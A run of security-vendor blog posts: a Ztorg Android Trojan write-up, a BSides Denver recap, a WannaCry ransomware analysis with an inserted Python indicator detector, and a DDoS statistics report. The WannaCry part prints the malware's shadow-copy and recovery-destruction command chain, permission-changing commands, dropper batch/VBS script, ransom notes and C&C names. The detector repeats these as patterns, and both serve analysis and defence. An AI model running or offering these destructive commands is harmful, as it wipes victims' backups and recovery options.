A few new folders appear on the SD card after a successful infection. Among them:

  • .googleplay_download
  • .nativedroid
  • .sysAndroid
  • DownloadProvider

All of these folders were used by some of the malware to spread the initial Ztorg infection and were used after infection to distribute other apps – some of them malicious.

Other Trojans

Although almost every Trojan from Google Play found during this research carried one of the three malicious modules described above, a few other Trojans were found as well.

One of them, called Money Converter (com.countrys.converter.currency, 55366B684CE62AB7954C74269868CD91), had been installed more than 10,000 times from Google Play. Its purpose is similar to that of the .gmtgp.apk module – it uses Accessibility Services to install apps from Google Play. Therefore, the Trojan can silently install and run promoted apps without any interaction with the user, even on updated devices where it cannot gain root rights.

It used the same command and control servers as .gmtgp.apk.


During the research period I found that Trojan.AndroidOS.Ztorg was uploaded to Google Play Store almost 100 times as different apps. The first of them was called Privacy Lock, had more than 1 million installations and was uploaded in mid-December 2015. Every month after I started tracking this Trojan in September 2016 I was able to find and report at least three new infected apps on Google Play. The most recent apps that I found were uploaded in April 2017, but I’m sure there will be more soon.

All of these apps were popular. Furthermore, their popularity grew very fast, with tens of thousands of new users sometimes being infected each day.

I found out that these Trojans were actively distributed through advertising networks. All these malicious campaigns contained the same URL, which allows me to easily track down any new infected apps.

I was surprised that these Trojans were distributed through apps that were paying users for installing promoted apps. It turned out that some users got paid a few US cents for infecting their device, though they didn’t know it was being infected.

Another interesting thing about the distribution of this Trojan is that after infection it used some of the advertising networks to show infected users ads about installing promoted apps. It creates a kind of ad recursion on infected devices – they become infected because of a malicious ad from an advertising network and after infection they see ads from the same advertising network because of the Trojan and its modules.

Cybercriminals were able to publish infected apps on Google Play because of the numerous techniques they used to bypass detection, and they continued to develop and add new features to their Trojans all the time. This Trojan has a modular architecture: it uses several modules with different functionality, each of which can be updated via the Internet. During infection Ztorg uses several local root exploit packs to gain root rights on the device. These rights allow the Trojan to achieve persistence on the device and deliver ads more aggressively.

BSides Denver 2017

Sat, 05/13/2017 - 17:38

Everyone loves a decent security conference, and BSides Denver provides one with space to breathe. Folks in sunny Colorado looking for a fine local gathering found talks on advanced social engineering, APT herding, securing smart cities and more.

Even though BSides got its start as an “open source” event taking its contributors from rejected Black Hat talks, this isn’t the island of misfit toys. Quality content is delivered at all of them. Here is Mandiant’s Hunter Hardman talking about the advanced social engineering techniques he tends to shun, opting instead for the email-reachable and helpful soft targets in marketing and HR. Discussion afterwards turned to the value of breaking news stories during red team projects, such as the current political environment’s effect on employee healthcare plans in the US.

Kyle Chambers from municipal energy provider Austin Energy presented ideas and thoughts on smart city implementations, audits, smart meters and data collection, and real-world integration experiences.

Considering the issues with IoT implementations and the immaturity of development cycles in the IoT space, along with the true nature of the risk involved, it’s a particularly alarming topic. And it’s great to see it being carefully discussed by organizations like Austin Energy.

Hope to see you at BSides Denver 2018!

WannaCry ransomware used in widespread attacks all over the world

Fri, 05/12/2017 - 13:30

Earlier today, our products detected and successfully blocked a large number of ransomware attacks around the world. In these attacks, data is encrypted with the extension “.WCRY” added to the filenames.

Our analysis indicates the attack, dubbed “WannaCry”, is initiated through an SMBv2 remote code execution in Microsoft Windows. This exploit (codenamed “EternalBlue”) has been made available on the internet through the Shadowbrokers dump on April 14th, 2017 and patched by Microsoft on March 14.

Unfortunately, it appears that many organizations have not yet installed the patch.


A few hours ago, Spain’s Computer Emergency Response Team, CCN-CERT, posted an alert on its site about a massive ransomware attack affecting several Spanish organizations. The alert recommends installing the updates in the Microsoft March 2017 Security Bulletin as a means of stopping the spread of the attack.

The National Health Service (NHS) in the U.K. also issued an alert and confirmed infections at 16 medical institutions. We have confirmed additional infections in several additional countries, including Russia, Ukraine, and India.

It’s important to understand that while unpatched Windows computers exposing their SMB services can be remotely attacked with the “EternalBlue” exploit and infected by the WannaCry ransomware, the absence of this vulnerability does not prevent the ransomware component itself from working. Nevertheless, the presence of this vulnerability appears to be the most significant factor behind the outbreak.

CCN-CERT alert (in Spanish)

Analysis of the attack

Currently, we have recorded more than 45,000 attacks of the WannaCry ransomware in 74 countries around the world, mostly in Russia. It’s important to note that our visibility may be limited and incomplete and the range of targets and victims is likely much, much higher.

Geographical target distribution according to our telemetry for the first few hours of the attack

The malware used in the attacks encrypts the files and also drops and executes a decryptor tool. The request for $600 in Bitcoin is displayed along with the wallet. It’s interesting that the initial request in this sample is for $600 USD, as the first five payments to that wallet are approximately $300 USD. This suggests that the group is increasing its ransom demands.

The tool was designed to address users of multiple countries, with translated messages in different languages.

Language list that the malware supports

Note that the “payment will be raised” after a specific countdown, along with another display raising urgency to pay up, threatening that the user will completely lose their files after the set timeout. Not all ransomware provides this timer countdown.

To make sure that the user doesn’t miss the warning, the tool changes the user’s wallpaper with instructions on how to find the decryptor tool dropped by the malware.

An image used to replace user’s wallpaper

Malware samples contain no reference to any specific culture or codepage other than universal English and Latin codepage CP1252. The files contain version info stolen from random Microsoft Windows 7 system tools:

Properties of malware files used by WannaCry

For convenient bitcoin payments, the malware directs to a page with a QR code at btcfrog, which links to their main bitcoin wallet 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94. Image metadata does not provide any additional info:

One of the Bitcoin wallets used by the attackers: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

One of the attacker wallets received 0.88 BTC during the last hours

Other Bitcoin wallets included in the attackers’ “readme.txt” from the samples are:
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn – 0.32 BTC

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw – 0.16 BTC

For command and control, the malware extracts and uses the Tor service executable, with all necessary dependencies, to access the Tor network:

A list of dropped files related to Tor service

In terms of targeted files, the ransomware encrypts files with the following extensions:

.der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .ott, .sxw, .stw, .uot, .3ds, .max, .3dm, .ods, .ots, .sxc, .stc, .dif, .slk, .wb2, .odp, .otp, .sxd, .std, .uop, .odg, .otg, .sxm, .mml, .lay, .lay6, .asc, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .frm, .myd, .myi, .ibd, .mdf, .ldf, .sln, .suo, .cpp, .pas, .asm, .cmd, .bat, .ps1, .vbs, .dip, .dch, .sch, .brd, .jsp, .php, .asp, .java, .jar, .class, .mp3, .wav, .swf, .fla, .wmv, .mpg, .vob, .mpeg, .asf, .avi, .mov, .mp4, .3gp, .mkv, .3g2, .flv, .wma, .mid, .m3u, .m4u, .djvu, .svg, .psd, .nef, .tiff, .tif, .cgm, .raw, .gif, .png, .bmp, .jpg, .jpeg, .vcd, .iso, .backup, .zip, .rar, .tgz, .tar, .bak, .tbk, .bz2, .PAQ, .ARC, .aes, .gpg, .vmx, .vmdk, .vdi, .sldm, .sldx, .sti, .sxi, .602, .hwp, .snt, .onetoc2, .dwg, .pdf, .wk1, .wks, .123, .rtf, .csv, .txt, .vsdx, .vsd, .edb, .eml, .msg, .ost, .pst, .potm, .potx, .ppam, .ppsx, .ppsm, .pps, .pot, .pptm, .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls, .dotx, .dotm, .dot, .docm, .docb, .docx, .doc

The file extensions that the malware is targeting contain certain clusters of formats including:

  1. Commonly used office file extensions (.ppt, .doc, .docx, .xlsx, .sxi).
  2. Less common and nation-specific office formats (.sxw, .odt, .hwp).
  3. Archives, media files (.zip, .rar, .tar, .bz2, .mp4, .mkv)
  4. Emails and email databases (.eml, .msg, .ost, .pst, .edb).
  5. Database files (.sql, .accdb, .mdb, .dbf, .odb, .myd).
  6. Developers’ sourcecode and project files (.php, .java, .cpp, .pas, .asm).
  7. Encryption keys and certificates (.key, .pfx, .pem, .p12, .csr, .gpg, .aes).
  8. Graphic designers, artists and photographers files (.vsd, .odg, .raw, .nef, .svg, .psd).
  9. Virtual machine files (.vmx, .vmdk, .vdi).

The WannaCry dropper drops multiple “user manuals” in different languages:

Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Filipino, Finnish, French, German, Greek, Indonesian, Italian, Japanese, Korean, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Spanish, Swedish, Turkish, Vietnamese

An example of a “user manual” in English:

What Happened to My Computer?
Your important files are encrypted.
Many of your documents, photos, videos, databases and other files are no longer accessible because they have been encrypted. Maybe you are busy looking for a way to
recover your files, but do not waste your time. Nobody can recover your files without our decryption service.

Can I Recover My Files?
Sure. We guarantee that you can recover all your files safely and easily. But you have not so enough time.
You can decrypt some of your files for free. Try now by clicking .
But if you want to decrypt all your files, you need to pay.
You only have 3 days to submit the payment. After that the price will be doubled.
Also, if you don't pay in 7 days, you won't be able to recover your files forever.
We will have free events for users who are so poor that they couldn't pay in 6 months.

How Do I Pay?
Payment is accepted in Bitcoin only. For more information, click .
Please check the current price of Bitcoin and buy some bitcoins. For more information, click .
And send the correct amount to the address specified in this window.
After your payment, click . Best time to check: 9:00am - 11:00am GMT from Monday to Friday.
Once the payment is checked, you can start decrypting your files immediately.

If you need our assistance, send a message by clicking .

We strongly recommend you to not remove this software, and disable your anti-virus for a while, until you pay and the payment gets processed. If your anti-virus gets
updated and removes this software automatically, it will not be able to recover your files even if you pay!

It also drops batch and VBS script files, and a “readme” (contents are provided in the appendix).

Just in case the user closed the bright red dialog box, or doesn’t understand it, the attackers drop a text file to disk with further instructions. Below is an example of their “readme”, dropped to disk as “@Please_Read_Me@.txt” in many directories on the victim host. Note that the English here is written well, with the exception of “How can I trust?”. To date, only two transactions appear to have been made to the 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn bitcoin address, for almost $300:

Q: What's wrong with my files?

A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!

Q: What do I do?

A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)

Q: How can I trust?

A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.

* If you need our assistance, send a message by clicking on the decryptor window.

Once started, it immediately spawns several processes to change file permissions and communicate with Tor hidden C&C servers:

  • attrib +h .
  • icacls . /grant Everyone:F /T /C /Q
  • C:\Users\xxx\AppData\Local\Temp\taskdl.exe
  • @WanaDecryptor@.exe fi
  • 300921484251324.bat
  • C:\Users\xxx\AppData\Local\Temp\taskdl.exe
  • C:\Users\xxx\AppData\Local\Temp\taskdl.exe

The malware creates mutex “Global\MsWinZonesCacheCounterMutexA” and runs the command:

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

This results in a UAC popup that the user may notice.

UAC popup to disable Volume Shadow Service (System Restore)

The malware uses Tor hidden services for command and control. The list of .onion domains inside is as follows:

  • gx7ekbenv2riucmf.onion
  • 57g7spgrzlojinas.onion
  • Xxlvbrloxvriy2c5.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion
  • sqjolphimrr7jqw6.onion
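
The command chain just described (the five backup-destruction commands joined with “&”, the icacls and attrib calls, the mutex and the .onion names) is a compact set of host indicators. The Python below is an added example, not Kaspersky’s code, of how a defender might match them against process-creation and mutex telemetry. The key=value log shape and the sample lines are constructed for the example, and the rule that three or more of the five backup-destruction commands must appear in one event before the severity rises is a threshold chosen here (an administrator may legitimately run a single vssadmin delete shadows).

```python
"""Host-indicator matcher for the WannaCry post-encryption command chain.

Added example, not Kaspersky's code. Log lines use a constructed key=value
shape; only the extractors at the top need changing for real telemetry.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# The five commands the sample chains with '&' to destroy Volume Shadow
# Copies and turn off Windows recovery (from the analysis above).
SHADOW_WIPE = {
    "vssadmin_delete_shadows": r"vssadmin(?:\.exe)?\s+delete\s+shadows",
    "wmic_shadowcopy_delete": r"wmic(?:\.exe)?\s+shadowcopy\s+delete",
    "bcdedit_ignore_failures": r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures",
    "bcdedit_recovery_off": r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no",
    "wbadmin_delete_catalog": r"wbadmin(?:\.exe)?\s+delete\s+catalog",
}
# Supporting indicators: the ACL/hide commands it spawns, the dropped
# decryptor name and the Tor hidden-service names used for C&C.
SUPPORTING = {
    "icacls_everyone_full": r"icacls\s+\.\s+/grant\s+Everyone:F",
    "attrib_hide_cwd": r"attrib\s+\+h\s+\.",
    "wanadecryptor_exe": r"@WanaDecryptor@\.exe",
    "tor_onion_name": r"\b[a-z2-7]{16}\.onion\b",
}
MUTEX_NAME = r"Global\MsWinZonesCacheCounterMutexA"

_PATTERNS = {k: re.compile(v, re.IGNORECASE) for k, v in {**SHADOW_WIPE, **SUPPORTING}.items()}
_MUTEX_FIELD = re.compile(r'mutex="(?P<name>[^"]*)"')  # constructed log field


@dataclass
class Finding:
    line_no: int
    indicator: str
    evidence: str


def scan_events(lines: List[str]) -> List[Finding]:
    """One Finding per indicator matched per log line (one line = one event)."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        for name, rx in _PATTERNS.items():
            m = rx.search(line)
            if m:
                findings.append(Finding(n, name, m.group(0)))
        m = _MUTEX_FIELD.search(line)
        if m and m.group("name") == MUTEX_NAME:
            findings.append(Finding(n, "wannacry_mutex", m.group("name")))
    return findings


def assess(findings: List[Finding]) -> Dict[str, object]:
    """Turn matches into a verdict.

    A lone 'vssadmin delete shadows' can be administrator activity, so the
    backup-destruction signal needs at least three of the five commands in
    the same event (threshold chosen for this example). The mutex or the
    decryptor file name tie the activity to this family; a .onion name on
    its own only says Tor is in use.
    """
    per_event: Dict[int, Set[str]] = {}
    for f in findings:
        per_event.setdefault(f.line_no, set()).add(f.indicator)
    wipe_events = sorted(n for n, s in per_event.items() if len(s & set(SHADOW_WIPE)) >= 3)
    family = sorted({f.indicator for f in findings} & {"wannacry_mutex", "wanadecryptor_exe"})
    if wipe_events and family:
        severity = "critical"
    elif wipe_events or family:
        severity = "high"
    elif findings:
        severity = "low"
    else:
        severity = "none"
    return {
        "severity": severity,
        "backup_destruction_events": wipe_events,
        "family_indicators": family,
        "all_indicators": sorted({f.indicator for f in findings}),
    }


# Constructed sample telemetry (not real logs): one infected host, plus one
# benign administrative shadow-copy deletion on another host.
SAMPLE_LOG = [
    '2017-05-12T13:31:02Z host=WS01 event=ProcessCreate cmdline="attrib +h ."',
    '2017-05-12T13:31:02Z host=WS01 event=ProcessCreate cmdline="icacls . /grant Everyone:F /T /C /Q"',
    '2017-05-12T13:31:03Z host=WS01 event=MutexCreate mutex="Global\\MsWinZonesCacheCounterMutexA"',
    '2017-05-12T13:31:05Z host=WS01 event=ProcessCreate cmdline="cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet"',
    '2017-05-12T13:31:06Z host=WS01 event=ProcessCreate image=C:\\Users\\xxx\\AppData\\Local\\Temp\\@WanaDecryptor@.exe cmdline="@WanaDecryptor@.exe fi"',
    '2017-05-12T13:32:10Z host=WS01 event=NetworkConnect cmdline="tor.exe" dest=gx7ekbenv2riucmf.onion',
    '2017-05-12T14:05:44Z host=ADMIN7 event=ProcessCreate cmdline="vssadmin delete shadows /for=C: /oldest"',
]

if __name__ == "__main__":
    verdict = assess(scan_events(SAMPLE_LOG))
    print(verdict["severity"], verdict["all_indicators"])
```

On the constructed sample the infected host scores “critical” (the full five-command chain plus the mutex and decryptor name), while the administrator’s single vssadmin command on ADMIN7 scores only “low”. For real telemetry such as Sysmon process-creation events, only the field extraction changes; the indicator table stays the same.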

Mitigation and detection information

The Kaspersky System Watcher component is essential in stopping these attacks. System Watcher can roll back the changes made by ransomware in the event that a malicious sample manages to bypass other defenses. This is extremely useful in case a ransomware sample slips past defenses and attempts to encrypt the data on the disk.

System Watcher blocking the WannaCry attacks

Mitigation recommendations:

  1. Make sure that all hosts are running and have enabled endpoint security solutions.
  2. Install the official patch (MS17-010) from Microsoft, which closes the affected SMB Server vulnerability used in this attack.
  3. Ensure that Kaspersky Lab products have the System Watcher component enabled.
  4. Scan all systems. After detecting the malware attack as MEM:Trojan.Win64.EquationDrug.gen, reboot the system. Once again, make sure MS17-010 patches are installed.

Samples observed in attacks so far:


Kaspersky Lab detection names:


Kaspersky Lab experts are currently working on the possibility of creating a decryption tool to help victims. We will provide an update when a tool is available.


Batch file

@echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut("C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe.lnk")>> m.vbs

echo om.TargetPath = "C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe">> m.vbs

echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs
del /a %0


SET ow = WScript.CreateObject("WScript.Shell")
SET om = ow.CreateShortcut("C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe.lnk")
om.TargetPath = "C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe"

DDOS attacks in Q1 2017

Thu, 05/11/2017 - 05:00

News Overview

Thanks to IoT botnets, DDoS attacks have finally turned from something of a novelty into an everyday occurrence. According to the A10 Networks survey, this year the ‘DDoS of Things’ (DoT) has reached critical mass – in each attack, hundreds of thousands of devices connected to the Internet are being leveraged.

The fight against this phenomenon is just beginning – IoT equipment vendors are extremely slow to strengthen information security measures in their own products. However, certain successes have been achieved in combating attackers behind the DDoS of Things. The well-known info security journalist Brian Krebs managed to identify the author of the infamous IoT malware Mirai. In the UK, the author of an attack on Deutsche Telekom was arrested. According to the charges, he allegedly assembled an IoT botnet from routers in order to sell access to it. He faces up to 10 years in prison in Germany.

Cheaper DoS tools and a growth in their number have caused an inevitable increase in the number of attacks on notable resources. For instance, unknown attackers took down the site of the Austrian Parliament, as well as more than a hundred government servers in Luxembourg. No one took responsibility for the attacks and no demands were made, which may mean the attacks were a test run, or simply hooliganism.

Plans by supporters of the Democratic Party to launch a massive attack on the White House site as a protest against the election of Donald Trump as US president came to nothing – there were no reports of problems with the site. Nevertheless, DDoS attacks have taken root in the US as a type of political protest. Two weeks before the inauguration, the conservative news site Drudge Report, which actively supported Trump during the election campaign, was attacked.

Law enforcement agencies took notice of this alarming trend, and the US Department of Homeland Security eventually stepped in to provide protection from DDoS attacks. The Department declared it aimed to “build effective and easily implemented network defenses and promote adoption of best practices by the private sector” in order “to bring about an end to the scourge of DDoS attacks.”

However, the main goal of the DDoS authors is still to make money. In this respect, banks and broker companies remain the most attractive targets. DDoS attacks are capable of causing such serious material and reputational damage that many organizations prefer to pay the cybercriminals’ ransom demands.

Trends of the quarter

There’s usually a distinct lull in DDoS attacks at the beginning of the year. This may be due to the fact that the people behind these attacks are on vacation, or perhaps there’s less demand from their customers. In any case, this trend has been observed for the last five years – Q1 is off season. The first quarter of this year was no exception: Kaspersky Lab’s DDoS prevention group recorded very low attack activity. This was in stark contrast to the fourth quarter of 2016. However, despite the now habitual downturn, Q1 of 2017 saw more attacks than the first quarter of 2016, which confirms the conclusion that the overall number of DDoS attacks is growing.

Due to the traditional Q1 lull, it’s too early to talk about any trends for 2017; however, a few interesting features are already noticeable:

  1. Over the reporting period, not a single amplification-type attack was registered, although attacks to overload a channel without amplification (using a spoofed IP address) were in constant use. We can assume that amplification attacks are no longer effective and are gradually becoming a thing of the past.

  2. The number of encryption-based attacks has increased, which is in line with last year’s forecasts and current trends. However, this growth cannot as yet be called significant.

As we predicted, complex attacks (application-level attacks, HTTPS) are gaining in popularity. One example was the combined attack (SYN + TCP Connect + HTTP-flood + UDP flood) on the Moscow stock exchange. A distinct feature of this attack was its rare multi-vector nature in combination with relatively low power (3 Gbps). To combat such attacks, it’s necessary to use the latest complex protection mechanisms.

Yet another unusual attack affected the site of the Portuguese police force. A notable feature of this attack was the use of vulnerabilities in reverse proxy servers to generate attack traffic. We assume the cybercriminals were trying to disguise the real source of the attack; and to generate traffic, new types of botnets were used, consisting of vulnerable reverse proxies.

On the whole, Q1 2017 didn’t bring any surprises. In the second quarter, we expect to see a gradual increase in the proportion of distributed attacks. Based on the next quarter’s results, it may be possible to get an idea of what we will face in 2017. For now, we can only guess.

Statistics for botnet-assisted DDoS attacks

Methodology

Kaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of various types and complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system. DDoS Intelligence (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.

This report contains the DDoS Intelligence statistics for the first quarter of 2017.

In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.

The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.

It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.

Q1 Summary

  • Resources in 72 countries (vs. 80 in Q4 2016) were targeted by DDoS attacks in Q1 2017.
  • 47.78% of targeted resources were located in China, which is significantly lower than the previous quarter (71.60%).
  • China, South Korea and the US remained leaders in terms of both number of DDoS attacks and number of targets, while the Netherlands replaced China in terms of number of detected servers.
  • The longest DDoS attack in Q1 2017 lasted for 120 hours – 59% shorter than the previous quarter’s maximum (292 hours). A total of 99.8% of attacks lasted less than 50 hours.
  • The proportion of attacks using TCP, UDP and ICMP grew considerably, while the share of SYN DDoS declined from 75.3% in Q4 2016 to 48% in the first quarter of 2017.
  • For the first time in a year, activity by Windows-based botnets has exceeded that of Linux botnets, with their share increasing from 25% last quarter to 59.8% in Q1 2017.

Geography of attacks

In Q1 2017, the geography of DDoS attacks narrowed to 72 countries, with China accounting for 55.11% (21.9 p.p. less than the previous quarter). South Korea (22.41% vs. 7.04% in Q4 2016) and the US (11.37% vs. 7.30%) were second and third respectively.

The Top 10 most targeted countries accounted for 95.5% of all attacks. The UK (0.8%) appeared in the ranking, replacing Japan. Vietnam (0.8%, + 0.2 p.p.) moved up from seventh to sixth, while Canada (0.7%) dropped to eighth.

Distribution of DDoS attacks by country, Q4 2016 vs. Q1 2017

Statistics for the first quarter show that the 10 most targeted countries accounted for 95.1% of all DDoS attacks.

Distribution of unique DDoS attack targets by country, Q4 2016 vs. Q1 2017

Similar to the ranking for attack numbers, targets in China received much less attention from cybercriminals in Q1 2017 – they accounted for 47.78% of attacks, although China still remained the leader in this respect. In fact, the top three remained unchanged from the previous quarter despite dramatic growth in South Korea’s share (from 9.42% to 26.57%) and that of the US (from 9.06% to 13.80%).

Russia (1.55%) fell from fourth to fifth place, after its share fell by just 0.14 p.p. Hong Kong took its place (+ 0.35 p.p.). Japan and France were replaced in the Top 10 by the Netherlands (0.60%) and the UK (1.11%).

Changes in DDoS attack numbers

In Q1 2017, the number of attacks per day ranged from 86 to 994. Most attacks occurred on 1 January (793 attacks), 18 February (994) and 20 February (771). The quietest days of Q1 were 3 February (86 attacks), 6 February (95), 7 February (96) and 15 March (91). The overall decline in the number of attacks from the end of January to mid-February, as well as the downturn in March, can be attributed to the decrease in activity by the Xor.DDoS bot family, which made a significant contribution to the statistics.

Number of DDoS attacks over time* in Q1 2017

* DDoS attacks may last for several days. In this timeline, the same attack may be counted several times, i.e. one time for each day of its duration.
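
The methodology’s definition of a single attack (a break of less than 24 hours does not split an attack; a longer break, or a second botnet against the same target, does), the counting of targets as unique IP addresses, and the footnote above on multi-day attacks being counted once per day of their duration can all be written down as a small procedure. The Python below is an added example, not Kaspersky’s DDoS Intelligence code; the intercepted-command feed, the Command and Attack types, the constructed sample and the cut-offs of the hour buckets are assumptions made for it.

```python
"""Attack counting the way the report's methodology defines it.

Added example, not Kaspersky's DDoS Intelligence code: the command feed,
the Command/Attack types and the sample data are assumptions made here.
"""
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# A pause of 24 h or more in commands from one botnet against one target
# ends the attack; anything shorter is treated as the same attack.
SPLIT_GAP = timedelta(hours=24)


@dataclass
class Command:
    """One intercepted C&C command: which botnet, which target, when."""
    ts: datetime
    botnet: str
    target_ip: str


@dataclass
class Attack:
    botnet: str
    target_ip: str
    start: datetime
    end: datetime

    @property
    def duration(self) -> timedelta:
        return self.end - self.start


def group_attacks(commands: List[Command]) -> List[Attack]:
    """Same botnet + same target with every break under 24 h is one attack;
    a longer break, or a different botnet, starts a separate attack."""
    attacks: List[Attack] = []
    current: Dict[Tuple[str, str], Attack] = {}
    for c in sorted(commands, key=lambda c: c.ts):
        key = (c.botnet, c.target_ip)
        open_attack = current.get(key)
        if open_attack is not None and c.ts - open_attack.end < SPLIT_GAP:
            open_attack.end = c.ts
        else:
            open_attack = Attack(c.botnet, c.target_ip, c.ts, c.ts)
            current[key] = open_attack
            attacks.append(open_attack)
    return attacks


def unique_targets(attacks: List[Attack]) -> int:
    """The report counts targets as unique IP addresses."""
    return len({a.target_ip for a in attacks})


def attacks_per_day(attacks: List[Attack]) -> Dict[str, int]:
    """Daily timeline as in the report's chart: a multi-day attack is counted
    once on every calendar day it was active."""
    counts: Counter = Counter()
    for a in attacks:
        day = a.start.date()
        while day <= a.end.date():
            counts[day.isoformat()] += 1
            day += timedelta(days=1)
    return dict(sorted(counts.items()))


def duration_bucket(d: timedelta) -> str:
    """Hour buckets used in the report's duration chart; the exact cut-off
    between whole-hour labels is an assumption made for this example."""
    h = d.total_seconds() / 3600
    if h <= 4:
        return "<=4h"
    if h < 10:
        return "5-9h"
    if h < 20:
        return "10-19h"
    if h < 50:
        return "20-49h"
    if h < 100:
        return "50-99h"
    return ">=100h"


def summarize(commands: List[Command]) -> Dict[str, object]:
    attacks = group_attacks(commands)
    return {
        "attacks": len(attacks),
        "unique_targets": unique_targets(attacks),
        "per_day": attacks_per_day(attacks),
        "by_duration": dict(Counter(duration_bucket(a.duration) for a in attacks)),
        "longest_hours": max((a.duration.total_seconds() / 3600 for a in attacks), default=0.0),
    }


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample feed (not real telemetry): two botnets, two targets.
SAMPLE_COMMANDS = [
    Command(_t("2017-02-18T01:00"), "xor.ddos", "203.0.113.10"),
    Command(_t("2017-02-18T09:00"), "xor.ddos", "203.0.113.10"),  # 8 h break: same attack
    Command(_t("2017-02-19T20:00"), "xor.ddos", "203.0.113.10"),  # 35 h break: new attack
    Command(_t("2017-02-19T22:00"), "xor.ddos", "203.0.113.10"),
    Command(_t("2017-02-18T03:00"), "nitol", "203.0.113.10"),     # other botnet, same target
    Command(_t("2017-02-18T23:30"), "nitol", "198.51.100.7"),
    Command(_t("2017-02-19T00:30"), "nitol", "198.51.100.7"),     # spans midnight: two days
]

if __name__ == "__main__":
    print(summarize(SAMPLE_COMMANDS))
```

On the sample the seven commands collapse into four attacks against two targets, and the nitol attack that runs across midnight appears in both 18 and 19 February of the daily timeline, which is exactly the double counting the footnote warns about.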

The distribution of DDoS activity by day of the week saw little change from the previous quarter. Saturday was the busiest day of the week in Q1 for DDoS attacks (16.05% of attacks). Monday remained the quietest day of the week (12.28%).

Distribution of DDoS attack numbers by day of the week, Q4 2016 and Q1 2017

Types and duration of DDoS attacks

In the first quarter of 2017, there was a sharp increase in the number and proportion of TCP DDoS attacks – from 10.36% to 26.62%. The percentage of UDP and ICMP attacks also grew significantly – from 2.19% to 8.71% and from 1.41% to 8.17% respectively. Meanwhile, the quarter saw a considerable decline in the share of SYN DDoS (48.07% vs. 75.33%) and HTTP (from 10.71% to 8.43%) attacks.

The increase in the proportion of TCP attacks was due to greater bot activity by the Yoyo, Drive and Nitol families. The growth in ICMP attacks is the result of Yoyo and Darkrai activity. Darkrai bots also began conducting more UDP attacks, which was reflected in the statistics.

Distribution of DDoS attacks by type, Q4 2016 and Q1 2017

In the first quarter of 2017, few attacks lasted more than 100 hours. The biggest proportion of attacks lasted no more than four hours – 82.21%, which was 14.79 p.p. more than in the previous quarter. The percentage of even longer attacks decreased considerably: the share of attacks lasting 50-99 hours accounted for 0.24% (vs. 0.94% in Q4 2016); the share of attacks that lasted 5-9 hours decreased from 19.28% to 8.45%; attacks lasting 10-19 hours fell from 7% to 5.05%. Meanwhile, the proportion of attacks that lasted 20-49 hours grew slightly – by 1 p.p.

The longest DDoS attack in the first quarter lasted for only 120 hours, 172 hours shorter than the previous quarter’s maximum.

Distribution of DDoS attacks by duration (hours), Q4 2016 and Q1 2017

C&C servers and botnet types

In Q1, the highest number of C&C servers was detected in South Korea: the country’s contribution increased from 59.06% in the previous quarter to 66.49%. The US (13.78%) came second, followed by the Netherlands with 3.51%, which replaced China (1.35%) in the Top 3 countries hosting the most C&C servers. The total share of the three leaders accounted for 83.8% of all detected C&C servers.

The Top 10 also saw considerable changes. Japan, Ukraine and Bulgaria left the ranking and were replaced by Hong Kong (1.89%), Romania (1.35%) and Germany (0.81%). Of special note was China’s sharp decline: the country dropped from second place to seventh.

Distribution of botnet C&C servers by country in Q1 2017

